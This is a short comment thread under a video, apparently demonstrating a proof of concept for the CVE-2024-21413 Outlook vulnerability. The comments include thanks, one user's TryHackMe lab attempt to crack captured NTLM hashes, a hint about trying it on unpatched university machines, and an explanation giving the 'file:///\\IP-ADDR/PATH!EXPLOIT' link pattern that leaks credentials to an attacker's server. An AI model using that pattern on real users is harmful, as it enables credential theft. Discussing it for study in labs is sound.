CVE-2024-21413 - Microsoft Outlook Remote Code Execution Vulnerability POC

Amazingly simple poc...thx!

To reinstall and renew security after experiencing the CVE-2024-21413 Microsoft Outlook Remote Code Execution Vulnerability, organizations should follow the remediation steps outlined by the Triskele Labs team and the Microsoft Security Response Center (MSRC). This may include applying patches released by Microsoft, updating affected versions of Microsoft Outlook, and implementing additional security measures to prevent exploitation of the vulnerability. It is crucial to stay informed about security updates and best practices to mitigate the risks associated with this vulnerability.

Nice video but no sound.

good !!

hi, where did you get the snapshot with the vulnerable version of outlook

My uni’s computers didnt do the update yet, I wonder if.. (I’m too lazy to do it but it prolly works)

thanks for the vid

what is link in Github? thanks for video

i dont want to know how much outlook got spammed with this shit man

ارقد ونوووم احسن ماتسوي شروحات

Hi, I followed same steps but my NTLM creds looks different, it is not ADMINISTRATOR, it started with tryhackme username(Note: I am using RDP to connect to attackbox) and also If i do hashcat on the resulting hash everytime it is getting exhausted(Note: I am using 4gb memory too)

Ah I see because you're creating a link with a "file" (with this structure: file:///\\IP-ADDR/PATH!EXPLOIT ) in the path. But this path which actually calls a potential arbitrary URL or IP address you can exfiltrate the NTLM credentials because Outlook authenticates itself over the currently logged in user at the file system which is in our case the catcher server. Is that correct?